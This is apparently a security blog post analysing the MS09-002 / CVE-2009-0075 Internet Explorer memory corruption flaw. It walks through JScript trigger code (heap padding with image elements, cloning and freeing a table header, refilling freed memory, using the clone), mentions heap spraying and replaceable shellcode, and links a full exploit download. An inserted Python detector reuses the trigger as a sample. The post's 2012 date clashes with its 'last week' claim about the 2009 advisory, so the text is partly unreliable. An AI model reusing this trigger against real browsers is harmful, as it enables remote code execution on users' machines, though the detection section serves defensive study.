Thursday, 5 July 2012

MS09-002 / CVE-2009-0075 Analysis

Alright, so we've been looking at the recent MS09-002 Memory Corruption Advisory released last week.

www.microsoft.com/technet/security/bulletin/MS09-002.mspx

We have provided a quick analysis of the vulnerability:

Initially, we call the global garbage collector to "prep" our memory for corruption. This forces JScript to clean up allocated memory that is no longer referenced (and would otherwise be lost).

CollectGarbage();

Next, we pad the memory by creating a minimum of 256 image elements and storing them in an array. I found that anything fewer than 256 does not give us enough padding to leverage when the exception occurs. Most exploits use between 512 and 1024 images.

var a1 = new Array();

for (var x = 0; x < 256; x++) {
    a1.push(document.createElement("img"));
}


Then we create a table header (or table body) element to interact with, and start the interaction.

o1 = document.createElement("thead");
o1.click;                 // referenced as a property, not called, as written in the original
var o2 = o1.cloneNode();  // o2 keeps a reference tied to the original element
o1.clearAttributes();

Once again we're going to prep our memory for corruption here:

o1=null; CollectGarbage();

The fault is triggered when we free the memory allocated for the table head (or table body) element we created, then overwrite the locations where our elements were created, and finally invoke the clone (o2.click). This results in adjacent heap corruption leading to code execution.

for (var x = 0; x < a1.length; x++) {
    a1[x].src = s1;       // s1 is a string defined in the full exploit, not shown here
}
o2.click;                 // use of the clone after the original has been freed
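From the defender's side, the ordered sequence above (create a table section, clone it, clear attributes, null + CollectGarbage, refill via img.src, then use the clone) is itself a usable signature. The following Python scanner is an added example, not part of redsand's post; it applies that sequence heuristically to script text, and both sample inputs are constructed (s1 is left undefined on purpose).

```python
import re
# Ordered markers of the trigger sequence; all six must appear in this order.
STEPS = [
    ("create_table_section", re.compile(r'createElement\(\s*["\'](?:thead|tbody|tfoot)["\']\s*\)', re.I)),
    ("clone_node", re.compile(r'\.cloneNode\s*\(', re.I)),
    ("clear_attributes", re.compile(r'\.clearAttributes\s*\(', re.I)),
    ("free_original", re.compile(r'=\s*null\s*;\s*CollectGarbage\s*\(', re.I)),
    ("refill_freed_memory", re.compile(r'\.src\s*=', re.I)),
    ("use_clone", re.compile(r'\.click\b', re.I)),
]
IMG_PAD = re.compile(r'createElement\(\s*["\']img["\']\s*\)', re.I)   # padding step
GC_CALL = re.compile(r'CollectGarbage\s*\(', re.I)                     # JScript-only call

def scan(script: str) -> dict:
    """Report which trigger steps occur in order, plus supporting indicators."""
    pos, found = 0, []
    for label, rx in STEPS:
        m = rx.search(script, pos)
        if m is None:
            break                  # sequence broken: stop at the first missing step
        found.append(label)
        pos = m.end()              # each later step must follow the previous one
    return {
        "steps_in_order": found,
        "complete": len(found) == len(STEPS),
        "img_padding": IMG_PAD.search(script) is not None,
        "collect_garbage_calls": len(GC_CALL.findall(script)),
    }

def verdict(script: str) -> str:
    r = scan(script)
    if r["complete"] and r["img_padding"]:
        return "likely CVE-2009-0075 trigger"
    if len(r["steps_in_order"]) >= 4:
        return "suspicious"
    return "clean"

# Constructed sample: the trigger sequence from the post, reassembled for scanning.
TRIGGER_SAMPLE = """CollectGarbage();
var a1 = new Array();
for (var x = 0; x < 256; x++) { a1.push(document.createElement("img")); }
o1 = document.createElement("thead"); o1.click;
var o2 = o1.cloneNode(); o1.clearAttributes();
o1 = null; CollectGarbage();
for (var x = 0; x < a1.length; x++) { a1[x].src = s1; }
o2.click;"""
# Constructed benign sample: ordinary table-section cloning with no free/refill step.
BENIGN_SAMPLE = """var t = document.createElement("tbody");
var c = t.cloneNode(true); document.body.appendChild(c);"""
```

The check is textual, so minified or obfuscated scripts need to be de-obfuscated first; the ordered-step output tells you which part of the sequence was (or was not) observed.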


Our exploit begins with the typical heap spraying method, providing us with a reliable location for installing our stage-1 execution payload.

Our personal exploit has been trimmed up to speed up execution time. The shellcode can be replaced to do whatever you'd like.

blacksecurity.org/cve20090075.html.gz


- redsand
